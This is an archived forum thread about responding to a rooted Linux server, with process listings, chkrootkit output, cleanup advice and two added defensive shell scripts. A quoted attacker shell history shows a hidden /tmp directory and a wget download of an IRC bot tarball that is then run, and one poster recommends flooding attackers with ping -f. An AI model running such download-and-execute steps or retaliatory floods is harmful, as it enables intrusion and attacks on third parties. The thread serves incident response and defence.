hacker attacking me...
802.11
06-23-2003, 11:35 PM
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.1 1372 480 ? S 10:02 0:04 init [5]
root 2 0.0 0.0 0 0 ? SW 10:02 0:00 [keventd]
root 3 0.0 0.0 0 0 ? SW 10:02 0:00 [kapmd]
root 4 0.0 0.0 0 0 ? SWN 10:02 0:00 [ksoftirqd_CPU0]
root 5 0.0 0.0 0 0 ? SW 10:02 0:00 [kswapd]
root 6 0.0 0.0 0 0 ? SW 10:02 0:00 [bdflush]
root 7 0.0 0.0 0 0 ? SW 10:02 0:00 [kupdated]
root 8 0.0 0.0 0 0 ? SW 10:02 0:00 [mdrecoveryd]
root 12 0.0 0.0 0 0 ? SW 10:02 0:00 [kjournald]
root 91 0.0 0.0 0 0 ? SW 10:02 0:00 [khubd]
root 186 0.0 0.0 0 0 ? SW 10:02 0:00 [kjournald]
root 187 0.0 0.0 0 0 ? SW 10:02 0:00 [kjournald]
root 188 0.0 0.0 0 0 ? SW 10:02 0:00 [kjournald]
root 189 0.0 0.0 0 0 ? SW 10:02 0:00 [kjournald]
root 190 0.0 0.0 0 0 ? SW 10:02 0:00 [kjournald]
root 533 0.0 0.1 1852 696 ? S 10:03 0:00 /usr/bin/ssh2d -q
root 550 0.0 0.1 1428 588 ? S 10:03 0:00 syslogd -m 0
root 555 0.0 0.1 1364 444 ? S 10:03 0:00 klogd -x
root 682 0.0 0.1 1452 572 ? S 10:03 0:00 /usr/sbin/fcron -b
root 700 0.0 0.3 2620 1236 ? S 10:03 0:00 /usr/sbin/sshd
root 720 0.0 0.2 2200 932 ? S 10:03 0:00 xinetd -stayalive -reuse -pidfile /var/
root 741 0.0 0.3 2428 1164 ? S 10:03 0:00 /bin/sh /usr/bin/safe_mysqld --defaults
mysql 784 0.0 1.4 29196 5512 ? S 10:03 0:00 /usr/libexec/mysqld --defaults-file=/et
mysql 798 0.0 1.4 29196 5512 ? S 10:03 0:00 /usr/libexec/mysqld --defaults-file=/et
mysql 799 0.0 1.4 29196 5512 ? S 10:03 0:00 /usr/libexec/mysqld --defaults-file=/et
root 800 0.0 0.4 4600 1816 ? S 10:03 0:00 sendmail: accepting connections
mysql 821 0.0 1.4 29196 5512 ? S 10:03 0:00 /usr/libexec/mysqld --defaults-file=/et
root 825 0.0 1.6 80028 6508 ? S 10:03 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PR
apache 838 0.0 1.8 80220 7176 ? S 10:03 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PR
apache 839 0.0 1.8 80324 7248 ? S 10:03 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PR
apache 840 0.0 1.8 80348 7176 ? S 10:03 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PR
apache 841 0.0 1.8 80240 7040 ? S 10:03 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PR
apache 842 0.0 1.8 80200 7216 ? S 10:03 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PR
apache 843 0.0 1.7 80204 6740 ? S 10:03 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PR
apache 844 0.0 1.8 80232 7176 ? S 10:03 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PR
apache 845 0.0 1.8 80240 7044 ? S 10:03 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PR
root 851 0.0 0.1 1548 620 ? S 10:03 0:00 crond
daemon 869 0.0 0.1 1404 524 ? S 10:03 0:00 /usr/sbin/atd
root 878 0.0 0.1 1344 400 tty2 S 10:03 0:00 /sbin/mingetty tty2
root 879 0.0 0.1 1344 400 tty3 S 10:03 0:00 /sbin/mingetty tty3
root 880 0.0 0.1 1344 400 tty4 S 10:03 0:00 /sbin/mingetty tty4
root 881 0.0 0.1 1344 400 tty5 S 10:03 0:00 /sbin/mingetty tty5
root 882 0.0 0.1 1344 400 tty6 S 10:03 0:00 /sbin/mingetty tty6
root 883 0.0 0.4 6156 1716 ? S 10:03 0:00 /usr/bin/gdm -nodaemon
apache 901 0.0 1.8 80348 7180 ? S 10:03 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PR
mysql 903 0.0 1.4 29196 5512 ? S 10:03 0:00 /usr/libexec/mysqld --defaults-file=/et
root 904 0.0 0.5 3680 2052 ? S 10:03 0:00 /usr/sbin/sshd
admin 905 0.0 0.3 2464 1300 pts/0 S 10:04 0:00 -bash
root 947 0.0 0.2 2332 1004 pts/0 S 10:04 0:00 su
root 948 0.0 0.3 2524 1356 pts/0 S 10:04 0:00 bash
mysql 1840 0.0 1.4 29196 5512 ? S 10:14 0:00 /usr/libexec/mysqld --defaults-file=/et
admin 1890 0.0 0.2 2520 928 ? S 10:32 0:00 /usr/libexec/openssh/sftp-server
apache 2199 0.0 1.8 80240 7048 ? S 10:38 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PR
apache 2200 0.0 1.8 80304 7248 ? S 10:38 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PR
apache 2201 0.0 1.7 80192 6736 ? S 10:38 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PR
apache 2202 0.0 1.7 80192 6740 ? S 10:38 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PR
apache 2203 0.0 1.8 80240 7044 ? S 10:38 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PR
apache 2204 0.0 1.8 80240 7048 ? S 10:38 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PR
apache 2205 0.0 1.8 80300 7252 ? S 10:38 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PR
apache 2207 0.0 1.8 80304 7244 ? S 10:38 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PR
apache 2208 0.0 1.8 80304 7248 ? S 10:38 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PR
apache 2209 0.0 1.8 80336 7176 ? S 10:38 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PR
apache 2210 0.0 1.8 80304 7228 ? S 10:38 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PR
mysql 2271 0.0 1.4 29196 5512 ? S 10:38 0:00 /usr/libexec/mysqld --defaults-file=/et
mysql 2290 0.0 1.4 29196 5512 ? S 10:43 0:00 /usr/libexec/mysqld --defaults-file=/et
root 2305 0.0 0.1 1344 400 tty1 S 10:43 0:00 /sbin/mingetty tty1
mysql 2321 0.0 1.4 29196 5512 ? S 10:46 0:00 /usr/libexec/mysqld --defaults-file=/et
mysql 2322 0.0 1.4 29196 5512 ? S 10:46 0:00 /usr/libexec/mysqld --defaults-file=/et
mysql 2450 0.0 1.4 29196 5512 ? S 11:14 0:00 /usr/libexec/mysqld --defaults-file=/et
root 2469 0.0 0.2 2748 788 pts/0 R 11:24 0:00 ps -aux
bash-2.05a#
netstat -taun
Port 56789 is open; how do I close it, and which task is running?
He deleted "ps" and I managed to copy ps back.
In /etc/passwd there is a h4x0r user, and there is a /home/h4x0r directory.
rid3r
06-24-2003, 12:05 AM
To find out the ports that are in listening state:
$ su
# netstat -ln
Finding out which programs are bound to open ports:
# netstat -lpn
tcp 0 0 0.0.0.0:56789 0.0.0.0:* LISTEN PID/h4x0r_prog
Printing the full description:
# ps auwex | grep -w PID
# kill -HUP PID
then remove the script, whatever the h4x0r has left.
# killall pppd
# userdel h4x0r
# rm -rf /home/h4x0r
# /etc/rc.d/init.d/httpd stop
# passwd (@#$dsf345sd#$%__!)
Analysis:
# less /var/log/apache/access_log
(I love this one):
cat /var/log/messages | awk '{print $4,$5,$6,$7,$8,$9,$10,$11,$12,$13,$14,$15}' |\
sed -e 's/\[[0-9]*\]:/:/' | sort | uniq | less
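The netstat -lpn step above can be made repeatable. The following is an added example, not rid3r's or the thread's code: it compares every listening socket in netstat -lpn output against an allowlist of ports you expect and prints anything else with its PID/program. The netstat sample embedded in it is constructed to resemble this box; the PIDs and the two rogue entries are made up, and unexpected_listeners is my name for the function.

```shell
#!/bin/sh
# Added example, not code from the thread: report listening sockets that are
# not in an allowlist of expected ports, from the output of `netstat -lpn`.
# Columns netstat -lpn prints: Proto Recv-Q Send-Q Local-Address
# Foreign-Address State PID/Program (UDP lines have no State column).
#
# Live use on the box (as root, so the PID/Program column is filled in):
#   netstat -lpn 2>/dev/null | unexpected_listeners 22 25 80 3306

# Arguments: the local ports you expect. Output: one "PORT PID/PROGRAM" line
# per listening TCP socket or bound UDP socket that is not in that list.
unexpected_listeners() {
    allow=" $* "
    awk -v allow="$allow" '
        # skip headers and unix-domain sockets
        $1 !~ /^(tcp|udp)6?$/ { next }
        {
            if ($1 ~ /^tcp/) {
                if ($6 != "LISTEN") next   # only listeners
                prog = $7
            } else {
                prog = $6                  # UDP: no State column
            }
            n = split($4, a, ":")          # "0.0.0.0:56789" or ":::22"
            port = a[n]
            if (index(allow, " " port " ") == 0) print port, prog
        }'
}

# Constructed sample resembling the thread's machine; PIDs and the two rogue
# entries (ssh2d on 56789, psybnc on 31337) are made up for the demo.
SAMPLE_NETSTAT='Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      700/sshd
tcp        0      0 0.0.0.0:25              0.0.0.0:*               LISTEN      800/sendmail
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      825/httpd
tcp        0      0 0.0.0.0:3306            0.0.0.0:*               LISTEN      784/mysqld
tcp        0      0 0.0.0.0:56789           0.0.0.0:*               LISTEN      533/ssh2d
tcp        0      0 0.0.0.0:31337           0.0.0.0:*               LISTEN      4242/psybnc
udp        0      0 0.0.0.0:514             0.0.0.0:*                           550/syslogd
Active UNIX domain sockets (only servers)
unix  2      [ ACC ]     STREAM     LISTENING     1234   784/mysqld   /var/lib/mysql/mysql.sock'

# Expected services on this box are sshd, sendmail, httpd and mysqld.
printf '%s\n' "$SAMPLE_NETSTAT" | unexpected_listeners 22 25 80 3306
# prints:
#   56789 533/ssh2d
#   31337 4242/psybnc
#   514 550/syslogd
```

Anything it prints is then looked up with ps auwex | grep -w PID as rid3r describes, before deciding whether to kill it.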
802.11
06-24-2003, 12:13 AM
wall "get out of system" in crontab for every minute.
restarted the machine
deleted the h4x0r entry from /etc/passwd
I did not delete /home/h4x0r
netstat -taun
port 546789 still listening
added iptables and changed the ssh port immediately
afterthefall
06-24-2003, 12:25 AM
It may be beneficial to check your /var/log/ files to see if the dude didn't cover their tracks. Definitely turn off all of your services for an indefinite amount of time - at least until you can determine what was compromised, and how, if possible.
Unfortunately, the only way to be sure that your system is no longer compromised is to wipe and start fresh. Using utilities like nmap and nessus, you can find open ports on your home box as well as assess their security risks. In general, if a port is open and you are not using it, there is no need to keep it open.
Sorry to hear about your misfortune, and keep us posted on your findings!
- atf
Sepero
06-24-2003, 01:11 AM
I hope this is a lesson to everyone. Use firewalls/routers, keep your software up to date, and make sure you aren't running services that don't need to be on. Just because you guys are using Linux, that doesn't mean your system is impossible to crack.
If I were you 802.11, I would backup my system and reinstall.
802.11
06-24-2003, 02:25 AM
0. email from chkrootkit contained 3 lines while I read that email from home
0.1 backup data to cd-rom daily and inform boss.
1. changed root password
2. found netstat -lpn
3. /usr/bin/ssh2d
4. vi /usr/bin/ssh2d
[binary ELF header, unreadable in vi]
^@$Info: This file is packed with the UPX executable packer http://upx.tsx.org $
^@$Id: UPX 1.11 Copyright (C) 1996-2000 the UPX Team. All Rights Reserved. $
http://upx.tsx.org/
802.11
06-24-2003, 06:57 AM
---a----- ssh2d
lsattr.
still can't ssh2d
e_a_olson
06-24-2003, 07:29 AM
N00b here: Why wouldn't the first step be to take the machine under attack off the network, and then secure it? Or is it, and it's just so obvious that it wasn't mentioned?
roamingnomad
06-24-2003, 08:38 AM
This won't really stop him or anything, but play with him and change his home directory on your system to "/dev/null". If you don't know what that is, it is essentially nothing, things sent there seem to vanish.... of course he could always just make a new user again, but this might slow him down, too.
(yes, I did get that idea from BOFH)
802.11
06-24-2003, 09:22 AM
I want to delete ssh2d first. can u help?
Sepero
06-24-2003, 10:23 AM
"I want to delete ssh2d first. can u help?"
Well why didn't you say that originally instead of that other gibberish! :)
chattr -a ssh2d
rm -f ssh2d
Spell
06-24-2003, 01:33 PM
The only way to ensure a clean system is a clean install. He/she had root access, and rootkits are fairly easy to get your hands on; if you can find a copy of chkrootkit (a scanner) you may be able to detect compromised system files, if any.
Programs like tripwire monitor critical files and can report when the files have been modified. It would be a good idea to back up the files tripwire monitors for a more easily recoverable system.
Since you'll likely be doing a new install, it may not hurt to add a few more layers of security..
Sendmail seems to have a notorious record for security, if you can replace it with something else, do so.
SSH can be easily configured for another port, most client ftp programs allow this also.
If you haven't done so already, change your firewall rules to drop; it dramatically increases the time it takes to port scan a computer.
Whois usually includes an xxx@abuse with the information given.
Maybe take a look at your logs also, and see if your system was used to compromise another system or commit (as of yet) an unknown crime.
Sepero
06-24-2003, 01:56 PM
Originally posted by Spell
If you haven't done so already, change your firewall rules to drop; it dramatically increases the time it takes to port scan a computer.
Hey, nice tip. I think I'll do that myself. :)
To 802.11, the guy that cracked your system most likely knows something about Linux, otherwise he wouldn't have known to delete 'ps'. But, he obviously doesn't know what he's doing very well or is careless, because a Real cracker would have installed a fake 'ps' to mask what he was doing.
If a Real cracker broke into your system, you probably wouldn't know it for weeks or months...
In this case, the best thing you could do is back up everything you may need and re-install your system...
Luck!
carrja99
06-24-2003, 03:05 PM
The fact that he created a h4x0r home dir makes it obvious he's showing off. Most likely, this isn't just some random malicious attack on some website server. What chat rooms/message boards have you been hanging around recently, 802.11??
Have you been challenging anyone to crack your system or bragging it can't be compromised?
802.11
06-24-2003, 06:29 PM
ROOTDIR is `/'
Checking `amd'... not found
Checking `basename'... not infected
Checking `biff'... not found
Checking `chfn'... not infected
Checking `chsh'... not infected
Checking `cron'... not infected
Checking `date'... not infected
Checking `du'... not infected
Checking `dirname'... not infected
Checking `echo'... not infected
Checking `egrep'... not infected
Checking `env'... not infected
Checking `find'... not infected
Checking `fingerd'... not infected
Checking `gpm'... not infected
Checking `grep'... not infected
Checking `hdparm'... not infected
Checking `su'... not infected
Checking `ifconfig'... INFECTED
Checking `inetd'... not tested
Checking `inetdconf'... not found
Checking `identd'... not infected
Checking `init'... not infected
Checking `killall'... not infected
Checking `ldsopreload'... can't exec ./strings-static, not tested
Checking `login'... not infected
Checking `ls'... not infected
Checking `lsof'... not infected
Checking `mail'... not infected
Checking `mingetty'... not infected
Checking `netstat'... not infected
Checking `named'... not infected
Checking `passwd'... /usr/bin/strings: passwd: No such file or directory
not infected
Checking `pidof'... not infected
Checking `pop2'... not found
Checking `pop3'... not found
Checking `ps'... not infected
Checking `pstree'... not found
Checking `rpcinfo'... not infected
Checking `rlogind'... not infected
Checking `rshd'... not infected
Checking `slogin'... not infected
Checking `sendmail'... not infected
Checking `sshd'... not infected
Checking `syslogd'... not infected
Checking `tar'... not infected
Checking `tcpd'... not infected
Checking `tcpdump'... not infected
Checking `top'... not infected
Checking `telnetd'... not infected
Checking `timed'... not found
Checking `traceroute'... not infected
Checking `w'... not infected
Checking `write'... not infected
Checking `aliens'... /etc/ld.so.hash
Searching for sniffer's logs, it may take a while... nothing found
Searching for HiDrootkit's default dir... nothing found
Searching for t0rn's default files and dirs... nothing found
Searching for t0rn's v8 defaults... Possible t0rn v8 (or variation) rootkit installed
Searching for Lion Worm default files and dirs... nothing found
Searching for RSHA's default files and dir... nothing found
Searching for RH-Sharpe's default files... nothing found
Searching for Ambient's rootkit (ark) default files and dirs... Possible Ambient's rootkit (ark) installed
Searching for suspicious files and dirs, it may take a while...
/usr/lib/perl5/site_perl/5.6.0/i386-linux/auto/NKF/.packlist /usr/lib/perl5/5.6.1/i386-linux/.packlist
Searching for LPD Worm files and dirs... nothing found
Searching for Ramen Worm files and dirs... nothing found
Searching for Maniac files and dirs... nothing found
Searching for RK17 files and dirs... nothing found
Searching for Ducoci rootkit... nothing found
Searching for Adore Worm... nothing found
Searching for ****C Worm... nothing found
Searching for Omega Worm... nothing found
Searching for Sadmind/IIS Worm... nothing found
Searching for MonKit... nothing found
Searching for Showtee... Warning: Possible Showtee Rootkit installed
Searching for OpticKit... nothing found
Searching for T.R.K... nothing found
Searching for Mithra... nothing found
Searching for OBSD rk v1... nothing found
Searching for LOC rootkit ... nothing found
Searching for Romanian rootkit ... /usr/include/file.h /usr/include/proc.h
Searching for HKRK rootkit ... nothing found
Searching for anomalies in shell history files... nothing found
Checking `asp'... not infected
Checking `bindshell'... not infected
Checking `lkm'... Checking `rexedcs'... not found
Checking `sniffer'... not tested: can't exec ./ifpromisc
Checking `wted'... not tested: can't exec ./chkwtmp
Checking `scalper'... not infected
Checking `slapper'... not infected
Checking `z2'... not tested: can't exec ./chklastlog
02:05:02 Job /home/myself/chkrootkit-0.40/chkrootkit terminated (exit status: 2) (mailing output)
vivid
06-24-2003, 07:08 PM
What program is that, that checks all those files?
phlipant
06-24-2003, 07:32 PM
don't forget to check /etc/hosts.allow and /etc/hosts.deny
Originally posted by vivid
What program is that, that checks all those files?
chkrootkit (http://www.chkrootkit.org/)
mrbl0nde
06-24-2003, 08:33 PM
if possible, rebuild your system on another hard drive and save the hacked one. it would be interesting to investigate the steps leading up to the security breach.
most likely (assuming the attacker didn't know a password beforehand, or something equally obvious) the exploit involved apache or sendmail, (possibly mysql, but not as likely). older versions of apache are prone to chunked data exploits (buffer overflows, i think), but sendmail may be a more likely candidate since it is running as root on your system (thus giving the attacker root access after exploiting the daemon).
check your mail and web server logs in /var/log for suspicious activity, such as repeated POST methods to apache where there really shouldn't be, or other strange looking entries. same with sendmail. make a list of the ip addresses associated with these dubious entries and, starting in the log directory, run a "grep -iRH 'ip address' *" for each ip to find other entries in other logs. it may be possible to reverse-construct the breach, if the log files haven't been altered. my guess would be that they haven't. anybody stupid enough to make a home directory called h4x0r wants people to know he's/she's been there.
so, first step is to remove your machine from the network completely...always.
next, try to figure out how the breach occurred, so when you rebuild your system you can prevent it from happening again. for example, if you determine apache is the offending app, figure out why and fix it on your "new" installation (by upgrading apache, securing its configuration, etc.).
last, perform a deeper analysis of the attack. try to find the ip(s) of the attacker, use a traceroute to find out where it originated, and go from there. like i said...this guy's either not too smart or just doesn't care.
the dangerous attacks are the ones you don't discover.
bandwidth_pig
06-24-2003, 08:51 PM
This is the best thread I have read here in quite some time. Matter of fact....I'm going to read it again.
bandwidth_pig
06-24-2003, 09:13 PM
Ok. Now that I have read the thread again (I was skimming through it like a freaking Tom Clancy Novel man...couldn't read it fast enough) I have a couple of questions about this interesting incident.
1. It is obvious the attacker used a root kit due to the infected ifconfig file that was found during the scan and the fact that it was later terminated (the root kit). My question is, how did the attacker get the root kit on the machine to begin with? Remote buffer overflow exploit that dumped a shell? But if he already dumped a shell (assuming it is a root shell) why bother with a root kit? Secondary measure for future visits? Although I really should soak this gem of a thread up again, it seemed as though ssh was in use...but it seems unlikely he managed to grab a shell this way.
2. I am curious about the whois output. If this person was behind a proxy or series of proxies, would whois not show the proxy DNS info? If so, that would seem useless.
3. And as pointed out by a previous poster, it is most interesting that the attacker did not even try to hide the fact he was on the machine (wall...get off the system...haxor...etc). It will be interesting to hear of future efforts because it seems quite likely.
But most of all, good luck to 802.11. Of course like most people, I immediately imagine myself in this same position and that would not be fun. But at least you did notice and perhaps put a stop to it. As mentioned previously, I would certainly do a fresh install. What distro was this btw?
mrbl0nde
06-24-2003, 10:01 PM
at my first post i didn't notice the ssh2d daemon running as root, also. there are some major vulnerabilities with older openssh versions, also, so this is another possible entry method. the rootkit, as bandwidth_pig mentioned, would likely have been installed to ensure future access if the attacker's first method was detected. a backup plan.
it is likely that the attacker IS behind some sort of proxy. however, they may simply be attacking from another system that is already compromised (have any of you ever run snort from a pc with a cable modem connection? there are countless subscribers whose machines have been compromised and are now used as launching points for new attacks, and they haven't a clue). at the very least, you can see the last hop in the chain, and be a good samaritan and alert somebody else to a breach on their system. were everybody to cooperate in the chain of connections, the origin point could probably be located. but this will not happen.
recommendations: once you have rebuilt your system, install snort and tripwire, and monitor their findings daily.
hlrguy
06-24-2003, 10:30 PM
An oldie but still a goody.
http://www.justlinux.com/forum/showthread.php?s=&threadid=75794&highlight=secure
I switched back to firestarter because you can see the hits as they happen. Guarddog didn't seem to work right with Redhat 8.0. Settings weren't persistent, but it may have been updated many times since I tried it.
If you find someone attacking your system,
ping -f <Their IP>
is usually enough to let them know you are on to them. Several times I have been port scanned (not nicely, like 30-50 hits in sendmail/second for 10 minutes kind of thing)
and this caused them to shut up pretty quickly. I usually report them to their ISP and in one case, they told me that they had deleted the person's account.
hlrguy
ghostwalker
06-24-2003, 10:51 PM
Take and follow some of what the following suggests for your distro and you should be in pretty good shape:
http://jetblackz.freeservers.com/
802.11
06-24-2003, 11:14 PM
Originally posted by carrja99
Have you been challenging anyone to crack your system or bragging it can't be compromised?
no. definitely not.
last night the system was ok.
(5:30-6:30) it was still ok.
I was unable to remove ssh2d.
I ran chkrootkit and
after 9:00, I discovered:
Searching for t0rn's v8 defaults... Possible t0rn v8 (or variation) rootkit installed
Searching for Ambient's rootkit (ark) default files and dirs... Possible Ambient's rootkit (ark) installed.
this is the unusual part.
If there is a third HD, I will re-install everything on the third HD.
I could only re-install the "second HD"; it can't boot up.
the feedback
a. ps -ef
apache links to geocities.com
b. netstat -taun
0.0.0.0:6 listen to 7
(I could not remember the whole thing.)
ICalledIt
06-24-2003, 11:16 PM
Originally posted by AnandT
It's really cool that you actually got attacked by a hacker, I thought this stuff never happens!
.....
..........
*ahem.....sorry.
Someone wants to nmap the world.
Happens all the time if you host web sites. It's happened to me before, not fun.
elite_syntax
06-25-2003, 12:02 AM
This is the work of a cracker, not a hacker, ok.
802.11
06-25-2003, 12:07 AM
do you mean an inside job from staff?
afterthefall
06-25-2003, 01:21 AM
Originally posted by hlrguy
If you find someone attacking your system,
ping -f <Their IP>
is usually enough to let them know you are on to them. Several times I have been port scanned (not nicely, like 30-50 hits in sendmail/second for 10 minutes kind of thing)
and this caused them to shut up pretty quickly. I usually report them to their ISP and in one case, they told me that they had deleted the person's account.
I've recently stumbled across root-tail ( root-tail.plan9.de ) while fooling around with using Eterm to tail various log windows, and so far it has seemed to work exceptionally well. The program writes directly to the root window, rather than to a stripped terminal window. You can set it up to tail multiple logs and can color code the various error messages as they are posted in real time to your logs.
I bring it up, just because of my increasing interest in network security, and that in the few hours that it has been up, I've been aware of at least 3 separate probes to my various services. Apache gets bombed the most, but rapidly scrolling text on your root window (which means it "sticks" between desktops) can be a pretty big tip off something is happening. I 'returned fire' with a quick nmap of their IP, and conveniently the would-be attacker ceased their respective scans.
Which brings me to another question... under metalog, /var/log/everything/current is supposed to catch every message sent through the logger, but this doesn't seem to catch messages posted to my login terminal. How do I capture this to a log so that I can keep an eye on my X sessions and apps (e.g. to know when my mail reader disconnects from the server, and so on)?
- atf
Sepero
06-25-2003, 06:29 AM
Originally posted by elite_syntax
This is the work of a cracker, not a hacker, ok.
Originally posted by 802.11
do you mean an inside job from staff?
No, he means that cracker stands for 'criminal hacker'. Real hackers don't break into other people's computers; they're just lovable nerds that like to spend hours perfecting software code. (Personally, I can't stand hacking. I just like to create the code and be done with it. :p)
In this thread, you can almost tell which people are more experienced with Linux just by reading whether they called this guy a 'cracker' or a 'hacker'. It's not very good entertainment, though. ;)
Read more about it here:
http://www.cbc.ca/news/indepth/words/hack.html
802.11
06-26-2003, 03:06 AM
before the system went down yesterday, I discovered that "the staff-K" had installed some software from geocities.com
this is from /root/.bash_history
q1. what is that site?
q2. why did he upgrade files in /etc/?
he once became Mandrake is better than RH.
> http://www.geocities.com/XXXenx/termmtermm.txt
>
> kei download
>
> ls hda*
> ls hdc*
> mount /dev/hdc1 /mnt/cdrom
> dmesg | more
> cd /
> mount /dev/hdc /mnt/cdrom
> cd /mnt/cdrom
> ls
> cd rpms
> ls
> man rpm
> ls
> rpm -Uvh *.rpm
> cd /etc
> tar -cvzf /root/etc.tgz *
> cd /var
> tar -cvzf /root/var.tgz *
> unmount /dev/hdc
> umount /mnt/cdrom
> mount
> cd ~
> ls
> cp *.tgz /home/kei
> cd /home/kei
>
> cd /tmp
> mkdir .stfu
> cd .stfu
> chmod 744 /usr/bin/ftp
> chmod 744 /usr/bin/wget
> wget www.geocities.com/XXXenx/kuyangora.tar.gz <----
> tar zxvf kuyangora.tar.gz
> rm -rf kuyangora.tar.gz
> cd kuya
> ./psybnc
> cd /tmp/.stfu
> w
> ls
> cd kuya
> ./psybnc
> cat psybnc.conf
Yinchie
06-26-2003, 03:34 AM
that's a funny bash_history log :)
Spell
06-26-2003, 10:53 AM
kuyangora.tar.gz -
Looks like an IRC bot; the home page for the actual program is here: http://www.psychoid.lam3rz.de/ (checksum doesn't match, of course). The real program is for keeping an IRC chat room open. The modified program could be used for sending your online status, DoS attacks, etc. If you're unsure of a file, you can gain more information from the prompt with $ file <filename> and $ strings <filename> (the latter is good for looking at executables without running the program). Unfortunately, I'm stuck with the programmers' comments for now.
Your network/system configuration files (iptables config, eth# config files) are in /etc/ (there may be a 31337 port listing, which happens to be in your psybnc.conf). Files are often replaced to hide the attacker's actions, i.e. a modified netstat to hide a listening port. There's a nice perl replacement script for netstat that can be found at http://cv.intellos.net; it's called conntrack (it also shows connections for masq, which is unsupported with netstat -M in rh8 and up).
The site is probably a place where the guy/girl keeps his files for upload.
You are lucky. The guy that got into your computer is a complete idiot...
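Spell's advice to look at a file with file and strings before running it, plus the UPX banner and the append-only flag that came up with ssh2d earlier in the thread, can be combined into one read-only triage script. This is an added example, not Spell's or the thread's code: printable_strings, is_elf, is_upx_packed, protected_attrs and triage_file are my names, and the files it inspects are constructed in a temp directory, not the real ssh2d.

```shell
#!/bin/sh
# Added example, not code from the thread: read-only triage of a suspicious
# binary such as /usr/bin/ssh2d. Nothing here executes the file. Checks:
#   1. ELF magic bytes (7f 45 4c 46) - is it an executable at all?
#   2. the UPX packer banner that vi showed inside ssh2d
#   3. lsattr flags a (append-only) / i (immutable), which make rm fail
#      until `chattr -a` / `chattr -i` is run as root
# printable_strings stands in for strings(1) so the script needs no binutils.

printable_strings() {
    # runs of 4+ printable ASCII bytes, one per line (like `strings -n 4`)
    LC_ALL=C grep -a -o -E '[[:print:]]{4,}' "$1"
}

is_elf() {
    [ "$(head -c 4 "$1" | od -An -tx1 | tr -d ' \n')" = "7f454c46" ]
}

is_upx_packed() {
    printable_strings "$1" | grep -q 'packed with the UPX executable packer'
}

protected_attrs() {
    # prints the subset of {a,i} set on the file; empty when neither is set
    # or when lsattr is unavailable (non-ext filesystem, no e2fsprogs)
    lsattr -d "$1" 2>/dev/null | awk '{print $1}' | tr -cd 'ai'
}

triage_file() {
    if is_elf "$1"; then kind=ELF; else kind=not-ELF; fi
    if is_upx_packed "$1"; then packed=upx; else packed=unpacked; fi
    printf '%s %s %s attrs=%s\n' "$1" "$kind" "$packed" "$(protected_attrs "$1")"
}

# Constructed samples in a temp dir: a fake "ssh2d" carrying the ELF magic
# and the UPX banner, and a plain text file for comparison.
SAMPLE_DIR=$(mktemp -d)
trap 'rm -rf "$SAMPLE_DIR"' EXIT
printf '\177ELF\001\001\001' > "$SAMPLE_DIR/ssh2d"
printf '$Info: This file is packed with the UPX executable packer http://upx.tsx.org $\n' >> "$SAMPLE_DIR/ssh2d"
printf 'just some notes\n' > "$SAMPLE_DIR/notes.txt"

triage_file "$SAMPLE_DIR/ssh2d"       # prints "... ELF upx attrs="
triage_file "$SAMPLE_DIR/notes.txt"   # prints "... not-ELF unpacked attrs="
```

A packed ELF that a package manager did not install, sitting in /usr/bin with the a or i flag set, is exactly the pattern chkrootkit was flagging on this box; the attrs column tells you whether chattr is needed before the file can be removed.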
802.11
06-27-2003, 05:44 PM
he has an account but he can have physical access to the machine too.
Originally posted by 802.11
he has an account but he can have physical access to the machine too.
Then you know the person? :confused:
802.11
06-27-2003, 10:52 PM
udp 0 0 20X.194.206.yy:33380 209.81.71.60:53 ESTABLISHED
tcp 0 0 127.0.0.1:32823 127.0.0.1:25 ESTABLISHED
tcp 0 0 127.0.0.1:25 127.0.0.1:32823 ESTABLISHED
udp 0 0 20x.194.206.yy:33380 209.81.71.60:53 ESTABLISHED
Gertrude
06-27-2003, 11:06 PM
tcp 0 0 127.0.0.1:32823 127.0.0.1:25 ESTABLISHED
tcp 0 0 127.0.0.1:25 127.0.0.1:32823 ESTABLISHED
Looks like your computer is sending out an email.
udp 0 0 20X.194.206.yy:33380 209.81.71.60:53 ESTABLISHED
This just looks like someone doing a dns lookup.
802.11
06-27-2003, 11:14 PM
yes, I am, but the email goes through north africa (brazil)
I am getting a bit "jumpy" now.
The original message was received at Sat, 28 Jun 2003 11:16:40 +0800
from localhost.localdomain [127.0.0.1].
my sendmail's mailertable has no entry at all. can you help?
Sorry, can't understand - could you be a bit more specific perhaps?
bones996
06-28-2003, 05:15 AM
This is probably one of the biggest reasons that I'm getting a new box so that I can set it up as a firewall with snort, squid, tripwire, chkrootkit, etc. running on it. I'm not overly paranoid, but I'd like to know if someone cracks my system & these programs have helped me to this point as a couple of them are run from cron almost every hour. This also helps me to pinpoint an attack & then take any necessary precautions.
I've had my box cracked once & my daily & weekly backups helped restore my system to the way it was before. But before I got back online I ran several programs, such as nessus & nmap, & have researched a whole new plan before I get my dedicated security box.
Hope this helps me be better prepared for the next attempt on my system ;)
Gertrude
06-28-2003, 05:47 AM
